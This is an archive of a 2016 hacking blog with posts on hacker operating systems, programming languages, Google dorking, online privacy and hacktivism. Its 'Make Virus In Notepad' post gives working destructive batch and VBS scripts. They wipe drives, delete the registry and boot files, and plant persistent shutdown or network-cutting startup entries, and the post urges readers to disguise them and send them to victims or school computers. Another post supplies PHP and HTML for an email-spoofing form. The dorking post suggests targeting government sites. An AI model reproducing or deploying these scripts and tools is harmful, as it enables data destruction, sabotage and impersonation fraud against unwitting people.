Thursday, 31 March 2016

All the Dumps a hacker needs


So for you to become a good hacker you need some resources.. This is going to be the shortest blog but with good information for you all :D

So I can't post dumps, hacks or anything here because then google will remove my blog. So I made a secondary site on a sub-domain, so that I can share quality information and tools if I have..

So here's the site:

Here are some image's of what you'll find there:
google dorks


browser user-agents 

I hope you like it!
I will keep updating that website & put only dumps and tools there.. So stay tuned.

Keep sharing and caring


Monday, 28 March 2016

Top 3 Operating System For Hackers

Top 3 Operating System for Hackers

Hacking Operating Systems need not be there to hack something, but it makes the stuff so much more easier and safer for you. There are still elite hackers who use old operating systems and don't ever require hacking oriented security os, but for most of the hacker it's a good choice to have them. Not only it makes it easy for you, but also keeps all the bad stuff away from your regular work. With that being said, let's see some of the easiest and best Security Operating Systems I have used and think are better than others.

One thing to note before going any further is that all these are made using the same Linux Kernel, so don't expect core changes in them. The changes only include the display, number of tools and other non-core stuff.

1. Paarrot-Sec Forensic OS

This is not an unknown os for many but if you're just starting to find out about hacking os, this may be new for you. So I like it more that kali linux for some reasons and it's also hated by some. My main reason to like it are:
1) The allocation of tools is better
2) It stands a little bit faster
3) Automatic Browser data deletion
The only problem is that if you want to upgrade it, it updates all the tools which need not be updates(or are already updated).

2. Kali Linux 2

It's one of the most popular os nowadays. This is because it is so frequently updates and that it's old versions: BackTrack 3 became the first of it's kind. Many people still use BackTrack r3 (the most popular version till date).
Some of the thing I like in it are:
1) It's simple to use
2) Has a lot of online tutorials
3) Has a lot of community support
4) Frequently updated
5) Noob Friendly

3.  Cyborg Hawk Linux

Yes! This is one of the most advanced of 2 mentioned above. Then why isn't it 1st? Because it is of a huge size!! There are so many tools and deendencies, that it takes a lot of time to download. Once downloaded, you're ready to join the elite hacker forces(Only if u know to use the tools)..
The best this about it is: 
1) It's Open-Source !!!! OMG!
2) Has "ALL" the needed tools
3) Growing support
4) Easy to use
5) Nicely allocated tool section

If you have a good download speed & time, go for it!! 

 -- Conclusion -- 

 All of these OS don't matter or are waste if you don't know how to use the tools. But again!, download the smallest one, then learn the tools and then download the most advanced one. You can hack even using Windows & these tools downloaded but Windows is considered very unsafe and predictable for other hacker.

Please share and keep stopping by :)


Sunday, 27 March 2016

Best Programming Language


So this can be a never ending discussion and this can never be properly explained because all the languages have different uses and all the languages have some purpose different from even the languages almost the same as them.

By that, let me try to clear stuff up for many beginners or even the people who have mastered some language. The one thing to keep in mind is that you need to keep an eye on all the languages but only master one! Never try to achieve success in all the languages around you and then brag, because then you're just a skid. Learn what you really feel fits you. It need not be easy, but be fully understandable by you.

How is programming related to hacking??

Hacking is all about programming! The one that tells you that hacking does not need mastering any particular language is a big liar and doesn't know hacking as a whole. Hacking is a wide term and it depends in which field of hacking you go. Some learn JavaScript while others don't need it. It really depends if you're interested in network security, cryptography, bug detection etc...
But whatever you choose, you need to know what goes on in the core of the whole process, only then you'll be able to break it apart. If you don't know what a battery is & what does it do, how will you put it in the toy car?

What is a preferred Language?

The most asked question is which language to start off with & what to do next. Nowadays, every kid knows HTML basics..If you don't, why are you even here? Go learn it first! 
So if you're into hacking, at-least learn some web-basics, because after all most of the things in hacking is directly or indirectly related to internet or some network maybe it PAN, LAN, MAN, WAN..
So to get straight, first learn XHTML (HTML+XML). Html will give you an idea of how webpages get displayed and XML has a LOT of functions not only in HTML but also in other languages. But these 2 are not the only thing to learn! Just after you do this, you need to (or must!) get an idea how desktop applications work. Like I said before,"Get to know whatever is around you, but master only one". The language to master depends on which field of hacking you prefer.

Which field of hacking is best/better?

 Because I assume you're still learning and not into some big security firm, application security should be your thing. Why? Because nowadays network security is too much emphasized and there are many hackers doing the same thing. Not only hackers, but also kids are doing the same thing. You can start off now and master network security, but then it takes more time and because you are still finding answers, application security is easier and fun. It's fun because you can be both hacker, tester and developer!

List of Easy Languages(may not be useful for you!)

This is just a few languages that allow different areas of software to be explored, in different ways. For a larger list of languages check out wikipedia's alphabetical list of programming languages

= Web Sites =

Basic static text websites can be created with a combo of these two languages and some graphics.

Type: Markup Language
Geared for: Websites
Difficulty: Very Easy
Compatibility: Works with modern browsers (Firefox, Chrome, Safari, Explorer)
Documentation: No lack of documentation. I find that the w3school tutorials cover just about everything, so it is unlikely you will need a book.
Notes: All you need is a good text editor. However there are also more complex programs like Dreamweaver to help simplify the creation of XHTML pages.

Type: Style Sheets
Geared for: Websites
Difficulty: Easy
Compatibility: Works with modern browsers (Firefox, Chrome, Safari, Explorer)
Documentation:Lots of great on-line tutorials. You might find buying a book helpful as it will explain more about design.
Notes: All you need is a good text editor. However there are also more complex programs like Dreamweaver to help simplify the creation of CSS files.

= Web Applications =

Web applications add interactivity to a website such as pop up boxes, log-in forms, shout boxes, games, and more.

Type: Interpreted / scripting
Geared for: Web Applications
Difficulty: Easy - Mild
Compatibility: Works with modern browsers (Firefox, Chrome, Safari, Explorer)
Documentation: Great on-line tutorials, but you may find a book helpful.
Notes: This gives web designers a scripting language to embed in there web pages. Can create pop up boxes, validate XHTML forms, and more. Code is executed by the browser.

Type: Interpreted / scripting
Geared for: Web Applications
Difficulty: Mild
Compatibility: Code is ran on server
Documentation: Good on-line tutorials, may want a book for more complete learning process.
Notes: Because code is executed on the server the user can not view the source code, this adds a level of protection and security for things like login forms and online transactions.

= Databases =

Databases allow you to store tons of information in a logical way. In software development you can use them to keep track of websites members, scores in a game, employee on a pay roll, and more.

Type: Structured Query Language
Level: Very High
Geared for: Databases
Difficulty: Mild - Hard
Compatibility: Used with many major database management systems (MySQL, PostgreSQL, Access, Oracle, SQLite, and more )
Documentation: Great documentation, many books, and on-line tutorials.
Notes: SQL is a standard language for accessing databases. There are many different versions of the SQL language. However, to be compliant, they all support at least the major commands (such as SELECT, UPDATE, DELETE, INSERT, WHERE) in a similar manner.

= Desktop Applications =
Type: Byte Compiled
Level: High
Geared for: .NET or Mono platforms
Difficulty: Mild
Compatibility: .NET on Windows, or Mono on Windows, Linux, & Mac
Documentation: .NET is well supported by Microsoft and there are many books available. Mono conforms to most of .NET standards.
Notes: VisualBasic.NET is a different language in the sense of syntax and code blocks. Reserved words such as Dim ... As, or Begin ... End are used instead of symbols like in C style languages. For this is the reason this language ended up on the list.

Type: Byte Compiled
Level: High
Geared for: .NET or Mono platforms
Difficulty: Mild
Compatibility: .NET on Windows, or Mono on Windows, Linux, & Mac
Documentation: No lack of documentation to speak of.
Notes: Great new language developed by Microsoft. Often compared with Java, though it is my opinion that C# is superior for windows development. Also works well with the Mono platform for linux.

C / C++
Type: Compiled
Level: Middle
Geared for: Desktop applications.
Difficulty: Hard
Compatibility: There are compilers for all platforms.
Documentation: Tons!! Books, on-line, people, just tons!
Notes: It is now an older language, but still very useful when you need to squeeze a lot of power into a program.

= Mixed (Desktop, Web Applications, Mobile Phones) =

Type: Byte Compiled
Level: High
Geared for: Portability
Difficulty: Mild - Hard
Compatibility: Cross platform
Documentation: Well documented
Notes: Good for teaching object oriented programming. Many library's, making development of complex programs more easy.

Python / Jython / IronPython
Type: Interpreted / Byte Compiled
Level: Very High
Geared for: Everything, and RAD (Rapid, Application, Development)
Difficulty: Easy
Compatibility: Cross platform
Documentation: Very well documented
Notes: Fantastic language for beginners! The Python interpreter is written in C. The byte code is specific to the python platform. Jython compiles to Java byte code and runs on the Java Virtual Machine. IronPython compiles to CIL (common intermediate language) for .NET or Mono platforms.

= 3D Graphics or flash games =

Type: Byte Compiled
Level: Very High
Geared for: 3D images, animation, and interactions.
Difficulty: Mild
Compatibility: Java platform
Documentation: Well documented
Notes: A fun and interesting language to do 3D work.

Type: interpreted
Level: Very High
Geared for: 2d Flash animations and Flex 3D
Difficulty: Mild
Compatibility: Works were ever flash or flex is compatible.
Documentation: Normal
Side notes: This is a popular language for this specific task.

= Embedded Systems =

Washing machines, tv's, watches, toasters, you name it!

Type: Assembled
Level: Low
Geared for: Special niches when needed
Difficulty: Very Hard
Compatibility: Each processor architecture has Its own version.
Documentation: Normal
Side notes: If you learn assembly for one architecture, than it isn't too difficult to code on different ones. You just have to learn a new instruction set.

----------------- CONCLUSION -----------

Lastly, I want to add that whatever you learn, you need to have a good interest from the beginning. It should not be a one night job! It should not be like people after some action movie(they want to do the same stuff the hero does). If you're one of those people, you're wasting your time in programming...

Please Share and keep stopping by


Friday, 25 March 2016

Catch an Online Child Predator

Catching an online child predator

I've seen a lot of online crime going on in years but none of them were as bad as this one. I call this worse because during every crime, only adults were involved and in very rare cases I stumbled upon a child. Look at any online crime and you will find grown teens or adults. For instance I know a lot of teen hackers and it's not a big thing.. But online predators come 100 steps down to mere kids who just have learned how to chat on social media websites. 
Let me show you some ways you can catch them on clearnet (normal internet)

1) Sign Up to Facebook

2) Now you need some fake images

For fake images, use Google Images
There are a lot of results, you can pick out images of same/similar people and put as your profile picture. Also download some extra images to upload online later.

3) Finding Predators

So now how to find predators?
1) Using Groups
2) By adding many people as freinds

So there are 2 ways you can find predators. You can start click all the suggestions, all the find friends and join friendship groups on Facebook.

Keywords for Finding Groups:

Friend, freindship, love, dating, finding love etc..

 4) Finding the right person

You never want to punish the good person. Many people are overly kind and ask you personal question. It does not mean that every good and curious person is a predator. Finding a right person needs some proof. It can be a proof like: When the person asks for your very private pictures or If a person calls you to give him something, if he blackmails you or threatens to hack your account and leak information. All of the above stuff are signs of either a hacker or a predator.

5) Saving Yourself 

 Saving yourself from online predators is not tough. Use these simple methods to protect your back:


VPN is effective to hide your IP Address to the third party, thus the predator will not be able to attack using your IP Address and not be able to find your location. Incase he does, then it's probably another hacker.


Using tor has many pros and cons. I would only say that don't ever go deep. Use Tor only for protecting your identity and browsing safely.Tor is a free and open project. You can also use I2P if you don't like Tor. The reason you won't like it because it's very slow as compared to any other service.


If you share your personal information on social-networks, you're a big fool! Yes, social network are to be social but not so much so that you share everything like how many marriages you had etc... 
If you keep don't it, I will personally try to hack you :P


Your safety lies in you own hands. I've told you the easiest ways to protect yourself from child predators. This information will in on case protect you from Federal Agencies(Incase you thought it would)...

In my next blog, I'll teach how Predators can protect themselves from you :P


Thursday, 24 March 2016

Posers on Inernet

So for some years I know how to differentiate between posers and real change makers. This may not be the hot topic but relevant for anyone who seeks to gain more information on hacktivist groups like Anonymous etc.. I'm not going to give you a Wikipedia article here, but stick to the topic. 

Who are posers?

They simply want attention to themselves by doing nothing, I mean "nothing at all". Yes they pose on Facebook, Twitter etc with Anonymous mask and tell everyone to be united but they themselves don't ever participate in any change making. When asked about this, their usual response is that they are educating other. -_-  COMMON! This is Internet age and no one needs your crappy "educating posts".  If you really want to help, help by either attending the protests or by hacking using the groups ideologies.

There are different types of posers: 
1) Loser Posers
2) Positive Posers
3) Elite Posers

Let's discuss what each group of posers do:

1) Loser Posers

I also call them the crappy posers. They are the scum of all social media and make it hard for us to view the quality information. They flood our timelines, newsfeed and notifications with crappy information. I'm not talking about people who post news, articles etc.. They are good but I'm talking about the one's that always cry about personal thing. And remember that they have their Anonymous masks on.. So it tells it all > They are not Anonymous, just posing.

2) Positive Posers

These are the one's that shout out about being a groups and maintaining the "legacy" but in real life, do nothing. They only want attention and want to be seen as the most positive and leading person of the whole group but rather are just posers. They want us to believe that they are the most inspirational, intellectual and deep people who care about the world, but they don't care s much as others do.

3) Elite Posers

I hate them to life. I hate their existence, I hate their posing and I hate their evil minds.. They're the one's who go to the media and then give interviews claiming to be with some group and talk all the irrelevant information. If you were with me, I would not tell you about "how important Anonymous is" but rather point out: "How data mining works", "How people can scam even the elite hackers" and "How cops can blame you for drug possession", But these posers want to get attention claiming to be the group leader. -_- really..... If one of these guys become the leader, I'll instantly leave my country and settle in a lonely island because then I would know that this world is gonna end..

So that brings the point, "Am I a poser?", "Is Bhavesh Kaul a poser?"
I cannot judge myself because I'll always feel good about myself, but I would clear things out. I would be called a positive poser back in 2010 because I didn't know any hacking but wanted to help. But from then on I came a long way & I'm not a poser. Many people say Blogging is a pose.... I would ask them, "If I wanted to pose, I would go out there and post my pics over internet with a mask on and giving interviews to news channels. I've enough information to become a elite poser, but posing is not my thing".

Note to all hacktivists

And to all the hackers out there, be ethical no matter how much any group tells you to be a black hat. There is good activism, ethical activism. You don't need to mess with the government to safeguard the interests of people, you need to help them. After-all we choose to be in a democcracy & we cannot deny the fact that they're the one's controlling the streets.


Is Internet Really Safe?

Is Internet Really Safe

Many people still use Windows for anonymous searching. Before we all brag about being "anonymous online" and 'try' to hide our standout's, there is a thing we all should keep in mind: We all whatsoever we do, cannot completely hide our information and delete our traces. Now I'll present some valid facts to prove that even the hardest criminals and hackers can be caught by the federal agencies.

#Fact 1

TCP/IP: The main protocol responsible for internet (Transfer Control Protocol/Internet Protocol) ensures the transfer of data via the internet. When TCP/IP was made, it was kept in mind that Internet will be used for sharing data & transparency but not anonymity.. So that being said, the very basics of internet was not there for our anonymity but for sharing and hence we cannot ever claim that internet was or is protecting out information by "hiding" it using some tool.

#Fact 2

ARPANET: The very first Internet project whose basics are still and will ever be used for modern internet, was only sharing. The most famous and relevant phrase is, "What goes online stays there forever". I know many people would say that we delete our information and that even the servers delete it from their systems, but let me assure you that even after deleting the data from both the client and server, it stays there as small bits and bytes of scattered information until it's over-written. No matter how much you delete the information from Whatsapp, Facebook, Twitter etc.. it will stay, forever.

#Fact 3

What big companies like Facebook don't want us to know is that they give all the information to the government (agencies) on demand. That doesn't mean that they give over all the information, but then again they don't care to. If any cop asks about your Facebook account regarding a suspicion, the company has to provide then with all your personal information. This will be fine for many people but then comes the great "Data Mining". In data mining, the company "mines" (extracts) everyone's data... Yes, "everyone" regardless if you're a simple person of a criminal. They don't care. Moreover, they sell the information and get $$$ out of it. They only mean business and don't really think the kind of person seeing the information on other end.

So after writing all this, I want to add that you can still manage to not get in the eyes of the cops and other agencies by using tools and utilities that can completely bleach out the data.. You can also use tools like Tor, I2p and Freenet to browse the internet Uncensored.

I will teach you the techniques you can use on Windows to protect yourself. But before it I want to say that if you use Windows and care about privacy, don't use it.


Saturday, 19 March 2016

Google Hacking


What is Google Hacking?

Google Hacking is a simple term to find Google Dorks using Let me be short and tell you how you can make your own dorks and also how can you find MANY vulnerable websites using this. Google dorks can find any type of vulnerability! 


There can be infinite queries but here I'll tell you some basic and most useful ones..
1. Inurl - As the name tells, it searches for item in the URL
2. Intitle - It searches for item in the title
3. Filetype - It searches for specified filetypes
4. Url - Simply searches for specified URL . I'll explain it later ;)

There are some more, but let's just stick with these cause they're most useful.

1. INURL: 

2) Type: inurl:

RESULT: You will see all the url with back ID as:
USE: With this we can search for sql injections..
MORE: We can search for .aspx pages, search boxes, text passwords, servers, login pages etc...

SPECIAL: If you want to hack some government website, type: inurl:/.gov


2) Type: intitle:Facebook

RESULT: You will see all the page titles with "Facebook"
USE: With this you can search custom sites, like your schools login page ;)

SPECIAL: You can use it with "url:" for precise search

2) Type: filetype:txt 

RESULT: You will see all the sites with .txt files on the public directory in their server
USE: You can search filetypes if you want to

SPECIAL: Type- inurl:pass filetype:txt

Wednesday, 16 March 2016

Make Virus In Notepad

Create Your Own Viruses
Today we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers 😀 . Let’s get started.

How to make a virus ?
  1. Open Notepad
  2. Put The Codes Provided
  3. Save it in the correct extension
  4. Done
  • Wiper [Not Official Name But I call It]
Deletes everything in the computer’s drive
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save As “Your File Name.bat [Batch File]
  • Registry Deleter
Deletes everything stored in registry
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
  • No Access
A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD
@echo off
Ipconfig /release
  • Shut Up
Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s
  • Crash Puter
This is simple virus that crashes the computer – [Save As Anything.VBS]
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
  • Ez Formatter
This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
  • Shutter
This virus can be very annoying it shutdowns computer every time the computer is turned on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
Now its time for few very dangerous viruses
  • Rest In Peace
It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
  • Century
Shut downs the PC hundred times. To stop Start Run and type shutdown -a . You can also change the times pc restarts by replacing 100 by your choice.
Create a new shortcut and type :-
shutdown -s -t 100 c “Installing Updates”
  • RIP -2
This virus does the same It also prevents pc from starting but in an effective and better way.
del c:\WINDOWS\system32\*.*/q
  • Freak
This virus disables the internet forever
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime 😀

Now there are some smart guys who check the batch files in notepad before running it. No big deal. An effective way .
How to make those stuff work ?
  1. Download and run the converter.
  2. Inject your batch file
  3. Choose Icon
  4. Version and information
  5. Compile
  6. Send to your victim
  7. Enjoy :)
Exe Converter (1.5MB) | Mirrors

Tuesday, 15 March 2016

Email Spoofing 2016 New Method

Email Spoofing 2016 

So email spoofing a way by which a person impersonated the email of another person by sending the header through a web-server without victims realization.

This is so easy to do! Some people search for months & still can't find a proper way to do it.

1) A free Sub-Domain (000webhost)
2) 3 Files ( *pngimage.php ; *bg1.png ; *sendmail.php )

You can either copy the code from here or ask me for a download link..

CODE - pngimage.php

header ("Content-type: ../image/png");

$rno = rand(1000,99999);
$_SESSION['ckey'] = md5($rno);

$img_handle = imageCreateFromPNG("bg1.PNG");
$color = ImageColorAllocate ($img_handle, 0, 0, 0);
ImageString ($img_handle, 5, 20, 13, $rno, $color);
ImagePng ($img_handle);
ImageDestroy ($img_handle);

CODE - sendmail.php

if ($_POST['Submit'] == 'Send')
if (strcmp(md5($_POST['user_code']),$_SESSION['ckey']))
header("Location: ../sendmail.php?msg=ERROR: Invalid Verification Code");

$to = $_POST['toemail'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$fromemail = $_POST['fromemail'];
$fromname = $_POST['fromname'];
$lt= '<';
$gt= '>';
$sp= ' ';
$from= 'From:';
$headers = $from.$fromname.$sp.$lt.$fromemail.$gt;
header("Location: ../sendmail.php?msg= Mail Sent!");
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns="" lang="en" xml:lang="en">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <meta name="language" content="en" />
  <meta name="robots" content="all,follow,noodp,noydir" />
  <meta name="googlebot" content="index,follow,snippet,archive,noodp" />
  <meta name="referrer" content="never" />
  <meta name="author" content="darksniper" />
  <meta name="copyright" content="darksniper" />
  <meta name="description" content="Email Spoofer" />
  <meta name="keywords" content="fake mailer,fakemailer,fakemail,fake mail,fake email,instant mailer,instantmailer,instant mail,instantmail,mailer,mail,emkei,attachment,encrypt,encryption,html mail,html email,spoofer,email spoofer,email prank,pranks,email,mail,gmail,yahoo mail,hotmail,google" />
<title>FTP Spoofer</title>


    box-shadow:5px 5px 5px black;


    box-shadow:0px 5px 5px blue;

box-shadow:0px 5px 5px black;

    box-shadow:0px 5px 5px blue;

    box-shadow:0px 5px 5px black;

    box-shadow:0px 5px 5px blue;

    box-shadow:0px 5px 5px black;

    box-shadow:0px 5px 5px blue;

    box-shadow:0px 5px 5px black;

    box-shadow:0px 5px 5px blue;

    box-shadow:0px 5px 5px black;




    font-family:comic sans ms;


    text-shadow:5px 5px 5px red;
<body bgcolor="#ffffcc">
<center><font id="font1"></font><br>
<h2>**Clearnet Version**</h2>
<font size="15px">Fuck The Police - Email Spoofer</font><br>
<font id="font2">Now do unrestricted & open chats on: <a href="">OpenChat</a></font></center>
<p style="margin-left:15px"><center>
<form id="f1" action="sendmail.php" method="POST">
<b>From Name:</b><br>
<input id="fromname" type="text" name="fromname" size="50"><br>
<br><b>From Email:</b><br>
<input id="fromemail" type="text" name="fromemail" size="50"><br>
<br><b>To Email:</b><br>
<input id="toemail" type="text" name="toemail" size="50"><br>
<input id="subject" type="text" name="subject" size="74"><br>
<br><b>Your Message:</b><br>
<textarea id="message" name="message" rows="10" cols="70">
<br><b>Verification Code:</b><br>
<input id="usercode" name="user_code" type="text" size="25"> 
<img src="pngimg.php" align="middle"><br><br>
<input id="but" type="submit" name="Submit" value="Send">
<input id="but" type="reset" value="Reset">
<?php if (isset($_GET['msg'])) { echo "<font color=\"red\"><h3 align=\"center\"> $_GET[msg] </h3></font>"; } ?>
<div id="otools"><center>
<a href=""><button id="b1">Random password generator</button></a>
<a href=""><button id="b1">Disposable Email</button></a>
<a href=""><button id="b1">Free web hosting</button></a><br></center>
<font id="foot">dArKsNiPeR , DarkCod3r</font>

IMAGE - bg1.png
Right click the image and save it.

1) Make a new site via the free hosting.
2) Upload these 3 files to your hosting.
3) Visit your site
4) Click on "sendmail.php"
5) Enter the fields
6) Voila! Done!

NOTE: Due to the recent yahoo changes, this does not work on yahoo mails

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